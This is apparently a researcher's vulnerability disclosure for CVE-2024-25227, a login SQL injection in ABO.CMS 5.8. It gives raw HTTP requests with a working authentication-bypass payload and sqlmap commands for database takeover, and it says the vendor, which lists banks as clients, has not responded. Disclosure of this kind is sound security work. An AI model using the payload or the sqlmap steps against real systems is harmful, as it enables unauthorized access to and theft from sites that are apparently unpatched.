I will start by detailing the vulnerability for everyone interested in the specifics, and later discuss how I discovered it and some information about the vendor.

ABO.CMS-Login-SQLi-CVE-2024-25227

CVE-2024-25227

Date: 23/02/2024

Tested on ABO.CMS 5.8

Vendor: ABO.CMS

Vendor URL: https://abocms.ru

Components affected

This vulnerability, found in the tb_login parameter of the admin login page, exposes the system to SQL injection attacks, allowing malicious actors to inject and execute arbitrary SQL queries.

Type

Remote

Implications

The implications of this vulnerability can be critical. With various exploitation techniques at a would be attackers disposal, including: boolean-based blind, error-based, stacked queries, time-based blind, and union queries, attackers can potentially gain unauthorized access to sensitive information, manipulate data, and even take control of the underlying database server under certain conditions.

All techniques I have verified work under this vulnerability:*

As the vendor has not responded to my requests for the past 14+ days, I am sceptical that they will fix this vulnerability in a timely manner and I would personally switch CMS' until these vulnerabilities have been addressed and fixed (if possible.) Additionally, heightened vigilance and proactive monitoring are essential to detect and mitigate potential exploitation attempts before they escalate into significant security incidents if you continue to use this CMS.

Test Environment

Furthermore, the details about the test environment--IIS 7.5/8.5 with MSSQL Server 2008 RP2 SP3 and running ASPx, and PHP.

Severity and Impact on Users/Clients

As far as I can tell, this could have quite a big impact on clients of the CMS as from the developer:

"The system was chosen by more than 3,000 companies"

"Including: InvestBank, SvyazBank, Slavyansky Credit, Rossium Concern, AmiBank, Arktur, Moscow Department of Education, RegionInvestBank, Housing Finance Bank, Foreign Economic Information Portal, APC, Russian Standard Bank, BikeLand, Federal Bank for Innovation and Development, RoboForex, PiterGaz, MotoPlaneta, SDM-Bank, XportMedia, etc."

https://www.abocms.ru/partners/partner/russia/*

It is frightening to see the potential impact, as one of the main attractions to this CMS was in part that its designed usage was for banks. To make this worse is that the vendor ensured it was secure and that "The coding standards and architecture used in development eliminate the appearance of vulnerabilities such as SQL injection or cross-site scripting."

"ABO.CMS - Secure web application!"

https://www.abocms.ru/about/security/*

Discovery

I was originally perusing various content management systems (CMS) for potential vulnerabilities. ABO.CMS was interesting to me as the first Eastern European CMS that I had come across and its vastly differing use cases based on edition. It is the first time I had seen a CMS with tiers like it.

Once I had obtained a sample to ABO.CMS 5.8 I dived into its modules

and found an endpoint within an admin login module. I looked into the post form data and through some inspection found out that the "tb_login" parameter was in fact vulnerable to SQL injection. With this, I was able to gain admin on the underlying module on the website, and I could inject SQL using many different techniques as mentioned previously.

Here are some examples of the Post request with the vulnerable module (tb_login), the original request and the SQLi ridden request:

original request

POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=**USERNAME**&tb_pwd=**PASSWORD**b_submit=+%C3+%D7+%CE+%C5+

altered request (SQLi)

(EXPLOIT to bypass the login authentication, grants you admin)

POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

Here is the payload without URL encoding:

27872164' or 2579=2579--

With the modified request with the payload, you are telling the backend, placeholder "27872164'" is combined with a condition that always evaluates to true ("2579=2579"), and to comment the remainder of everything else out in the query with "--" as to ensure the modified query is injected. This effectively bypasses any and all authentication checks related to the "tb_login" field, allowing unauthenticated access to the control panel with admin.

If you would like to do more to the underlying system, then you can use any one of these techniques as previously mentioned in conjunction with a tool like SQLmap to automate the process.

Techniques I have vetted:

Boolean-based blind, error-based, stacked queries, time-based blind, and union queries.

It is incredibly easy to do, and you can completely take over a system and its database with this.

All you need to do create a file and take the request, add a "*" where the payload would be and sqlmap will do the rest:

POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://%2Aip%2A/image/admin/login.aspx?ReturnUrl=%2FImage%2FAdmin%2Fdefault.aspx

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=*&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

request.txt*

sqlmap -r request.txt --batch --banner

Who are ABO.CMS??

Here is a little backstory on ABO.CMS, from the pieces I have been able to grasp together and translate.

ABO.CMS

Our vendor is ABO.CMS which was previously known as Armex BackOffice in the early 2000s:"A commercial content management system originally known as Armex BackOffice and developed by Armex in 2004." - via EDSD - ABO CMS – creating web applications with modular architecture (edsd.com)

It appears to be a CMS mainly used in Russia and Eastern Europe, with many different editions that are built for slightly different functions:

Start ABO.CMS: Start The software product is designed to quickly create a website with minimal financial investment, which would allow you to present basic information about the company and its services. The product includes an installer, a system core and 6 software modules. Cost - 2,900 rubles.

ABO.CMS: Promo ABO.CMS: Promo The software product is designed to support advertising campaigns to promote goods and services on the Internet. In the shortest possible time, you will be able to develop a website that will allow you to present the object of advertising in a dynamic and very detailed manner. The product includes an installer, a system core and 11 software modules. Cost - 5,900 rubles.

CMS for creating online communities ABO.CMS: Community The editors allow you to create interesting and multifunctional information portals and online communities. The system's capabilities allow users to make new acquaintances, communicate with each other, and create their own blogs and photo galleries. And much more. The product includes an installer, a system kernel and 18 software modules. Cost - 9,900 rubles.

Content management system ABO.CMS: Corporate Using the editors to create a corporate website, you solve the problems of developing your company in the direction of openness, raising the overall level of service for your partners and clients. The product includes an installer, a system kernel and 22 software modules. Cost - 11,900 rubles.

CMS for managing an online store ABO.CMS: Shop The editors ensure the creation of full-fledged and multi-profile online stores in which the purchasing process for customers will be not only useful, but also enjoyable. The product includes an installer, a system core and 14 software modules. Cost - 14,300 rubles.

ABO.CMS: Business ABO.CMS: Business The product version is intended for conducting comprehensive commercial and social activities on the Internet. It will allow your company to take into account all the subtleties and specifics of your business, making you a leader among your competitors. The product includes an installer, a system kernel and 26 software modules. Cost - 23,900 rubles.

via - https://www.abocms.ru/editions/*

It appears to have quite a huge customer base, again, they quote 3000 companies use their software, many being in the banking sector. Of this, they state that "The system is registered in the official register of Computer Programs of the Russian Agency for Patents and Trademarks." They share a picture with validation of this:

https://www.abocms.ru/files/images/register_small1.jpg

It even has a user manual!

via -https://www.abocms.ru/about/

The official CVE entry from Mitre is here, as well as my more formal github documentation:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25227

https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227/tree/main

https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227/tree/main

Thanks for reading! --TTA